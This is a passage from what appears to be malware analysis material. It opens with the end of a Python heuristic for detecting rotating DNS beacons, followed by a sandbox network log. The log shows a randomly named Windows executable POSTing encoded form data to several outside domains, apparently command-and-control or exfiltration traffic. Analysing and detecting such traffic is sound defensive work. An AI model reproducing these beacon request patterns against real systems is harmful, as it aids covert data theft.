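    if stats["n_domains"] < min_domains or stats["median_interval"] <= 0:
        return False
    if stats["n_domains"] < 0.9 * stats["n_queries"]:   # same names repeated: not rotation
        return False
    med = stats["median_interval"]
    jitter = max(stats["max_interval"] - med, med - stats["min_interval"]) / med
    return jitter <= max_jitter


if __name__ == "__main__":
    for label, text in (("report", DNS_QUERIES), ("benign", BENIGN_QUERIES)):
        st = rotation_stats(parse_queries(text))
        verdict = "rotating beacon" if looks_like_rotating_beacon(st) else "no pattern"
        print(label, st, verdict)
```

On the report's sixteen lookups the median gap is about 13.66 s with every gap between 13.1 s and 16.0 s, so the cadence check passes; the constructed browsing sample repeats names and touches only three domains, so it does not.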
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 11:17:24.474478006 CEST | 495 | OUT | GET /a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.2bhp.com
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Sep 11, 2024 11:17:25.129198074 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:17:25 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 63317 | 217.70.184.50 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 11:17:40.222723007 CEST | 766 | OUT | POST /8pln/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ultraleap.net
                                                      Origin: http://www.ultraleap.net
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.ultraleap.net/8pln/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 76 6d 39 63 42 63 65 56 73 4c 48 56 55 55 63 2b 39 67 31 66 62 72 70 56 46 65 49 5a 7a 77 55 46 41 3d 3d
                                                      Data Ascii: pP_8=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
Sep 11, 2024 11:17:40.860830069 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:40 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                      Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 63318 | 217.70.184.50 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 11:17:43.430991888 CEST | 786 | OUT | POST /8pln/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ultraleap.net
                                                      Origin: http://www.ultraleap.net
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.ultraleap.net/8pln/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 2f 31 49 55 6b 54 45 73 63 79 35 44 4e 50 41 67 73 49 54 49 4d 68 50 70 71 51 58 67 61 33 72 34 76 6b 4b 75 67 70 76 4f 36 45 36 62 6a 47 34 4a 42 4c 48 34 78 51 76 36 4f 4b 59 53 75 4e 5a 32 58 51 61 61 38 72 4d 6d 73 35 4f 45 76 6e 65 73 47 36 50 33 6e 65 68 55 33 48 4c 6e 69 73 57 54 42 79 36 78 55 50 34 55 42 2b 5a 50 44 4c 6c 30 6e 43 7a 67 2f 36 76 4b 4c 39 65 52 51 52 5a 66 4c 42 51 53 46 47 76 4d 42 69 4e 62 50 61 49 43 58 38 55 77 4e 64 65 41 4a 68 4b 56 4d 38 52 65 66 58 64 50 76 42 4c 45 79 78 74 45 67 3d
                                                      Data Ascii: pP_8=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H/1IUkTEscy5DNPAgsITIMhPpqQXga3r4vkKugpvO6E6bjG4JBLH4xQv6OKYSuNZ2XQaa8rMms5OEvnesG6P3nehU3HLnisWTBy6xUP4UB+ZPDLl0nCzg/6vKL9eRQRZfLBQSFGvMBiNbPaICX8UwNdeAJhKVM8RefXdPvBLEyxtEg=
Sep 11, 2024 11:17:44.027640104 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:43 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                      Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 63319 | 217.70.184.50 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 11:17:45.975841045 CEST | 10868 | OUT | POST /8pln/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ultraleap.net
                                                      Origin: http://www.ultraleap.net
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.ultraleap.net/8pln/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 33 31 49 68 77 54 46 4c 41 79 34 44 4e 50 44 67 73 4c 54 49 4d 6f 50 70 79 55 58 67 57 42 72 2b 72 6b 49 4d 59 70 70 2f 36 45 78 62 6a 47 30 70 42 4f 61 49 78 42 76 2b 71 56 59 53 2b 4e 5a 32 58 51 61 59 6b 72 62 69 34 35 43 6b 76 6b 49 63 47 2b 46 6e 6e 36 68 55 76 58 4c 6e 75 38 57 69 68 79 37 51 6b 50 30 47 5a 2b 61 76 44 4a 6d 30 6e 61 7a 67 69 36 76 4f 72 4c 65 53 4e 38 5a 59 37 42 51 56 38 51 35 4f 45 2b 58 71 66 70 56 54 50 76 55 79 46 6e 58 33 52 32 44 45 45 44 4f 65 58 50 47 49 48 46 4d 6d 32 79 75 78 73 33 79 49 30 62 67 78 54 31 76 59 77 46 50 6c 63 4e 6b 43 55 61 77 63 32 33 53 32 73 38 46 79 41 50 50 64 48 67 6a 31 39 62 54 38 61 6b 38 73 72 51 31 6a 54 59 71 49 70 5a 37 5a 4f 42 66 30 55 49 38 66 74 56 56 43 48 68 41 46 70 65 70 39 6b 51 48 32 31 4b 4b 4e 42 48 77 61 59 6d 4c 2b 38 54 38 78 47 41 4d 72 71 65 74 36 68 4e 78 78 55 5a 65 31 39 6d 52 [TRUNCATED]
Data Ascii: pP_8= [TRUNCATED]
Sep 11, 2024 11:17:46.566657066 CEST | 713 | IN | HTTP/1.1 502 Bad Gateway
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:46 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 568
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.4 | 63320 | 217.70.184.50 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:17:48.519026041 CEST | 500 | OUT | GET /8pln/?pP_8=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.ultraleap.net
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:17:49.105931997 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:17:49 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Vary: Accept-Language
                                                      Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
                                                      Sep 11, 2024 11:17:49.105952024 CEST | 890 | IN | Data Raw: 72 61 6c 65 61 70 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                                      Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.4 | 63321 | 172.96.187.60 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:17:54.669792891 CEST | 760 | OUT | POST /v2c3/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dalong.site
                                                      Origin: http://www.dalong.site
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.dalong.site/v2c3/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=1I+bo9ThlE8GqOuGcnSU+Bbd2h1OXOMUeIC3Ri8l8uSR4AE9EDZTcwNBSPpalzTYplAzLM8/2zNugEfxXhAU4NyNIp5XwjNnlYzY7/XkPBvy/icMkTlqdWwvLjoAqV4YQLDHWkNL+kRRQMK5ws4kaKkHuTAI9ylnTQZ/jRfjRmSrU9AVskC6Ec09sUlizF6E2A==
                                                      Sep 11, 2024 11:17:55.140651941 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:17:55 GMT
                                                      server: LiteSpeed
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.4 | 63322 | 172.96.187.60 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:17:57.228420019 CEST | 780 | OUT | POST /v2c3/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dalong.site
                                                      Origin: http://www.dalong.site
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.dalong.site/v2c3/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YKR4h09KhxTSQNBavpV4DSWpldMLOo/21hugBbxXW0V6dyDQZ5G+DNnlYzY77+BPB3y+TsMl2RtQ2wsIjoA8V4iQLCiWhsQ+mZRQOS5394nUKkBgzBAxBFrUV82mBLjTUCWV7RP9VjtWcQOxTsW+GHNtKqWRrRWXKIJKqbuAURbVlY=
                                                      Sep 11, 2024 11:17:57.660542965 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:17:57 GMT
                                                      server: LiteSpeed
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.4 | 63323 | 172.96.187.60 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:17:59.768162012 CEST | 10862 | OUT | POST /v2c3/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dalong.site
                                                      Origin: http://www.dalong.site
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.dalong.site/v2c3/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YyR43o9FgxTTQNBUPpF4DSbplFILOkJ2w9uxXnxeCoVzdyDMp4BwjN+lYjc7/aBPB3y+R0MsDltDmwvLjoMqV5NQLqUWhgA5VhReOC51PQncKkDjzAGxBI1URcQmB+ETWeWV6RWkhTlJ9Qdsg4q6hjhqJ+PdqVxDe4ZFLmhH25wMwikrO+EbF3SsISwhxPwiXsOtIUb7N9/KO44BMTeDOrNlKL7bC+Vn63VslTlhj65fAY5k3VmmKGgp6nW6UYiRrrr4HeSXUUUUxfx5EzRWzQIG0+VGjb5H6TdSam2oNWQjGm8uO3He1slqVsZQ9Hp1lPL2YQYslIGLJ6s6PGwfQ9/pDxhAjbPJ5Ux9kn4zF9/lV+R9H62aVUGaM6R4Vo6pnPxZ5Iwr4GidIs4N5cIgwt/TKNgLhNthVL+Dwk07TBYjBA/IUuWtOF5+lIBzp4p/DmBQe5k8PQ6k1hXnybwW2ry5FPX0/oqqiaRYdwM9aPnp9/MIyOztGxf1FrTCTU1kGqIo/OW9IUCoe2OxDYYbSfz171zPzr0PL9p3bnzk4m38qR6Jch+VryCIFbtSXBEMk7IDJ3AxgZJyLnqVZcy3NbgwrQoKgcpFZWjPqtSLciKhSQq/OW/S3fusSw/1dKlux20a1bMxnPz4+OAh6JpX6JwtsxN8ZBJZ0UVloa7B0I3EFflzN6TeUdtoTKwlpboBJ8JNGfWbg8UcyG2dM4LYN1iyiDH7nLiibUaykwRFqWhPkPBYmG+OlhU85BOu8sLXeZ+AbwshXt4zqcITPZXqFuBtSp0aZDjKuiq9nC3B9NLbv98F0TLKftQb20JaLdiqMdse5Tj31rjbJkmuA9ifbQzagU9Oxj0L3QRZmOAAQCx2FsKX777FCqbfnxEAjalFR5g5HL/S3Q9TmIkBekTJxBOldcBGX+rgSjA+rS2ohDGcmdReX10iF/7mvz9RXJEGbRLXxC [TRUNCATED]
                                                      Sep 11, 2024 11:18:00.220200062 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:18:00 GMT
                                                      server: LiteSpeed
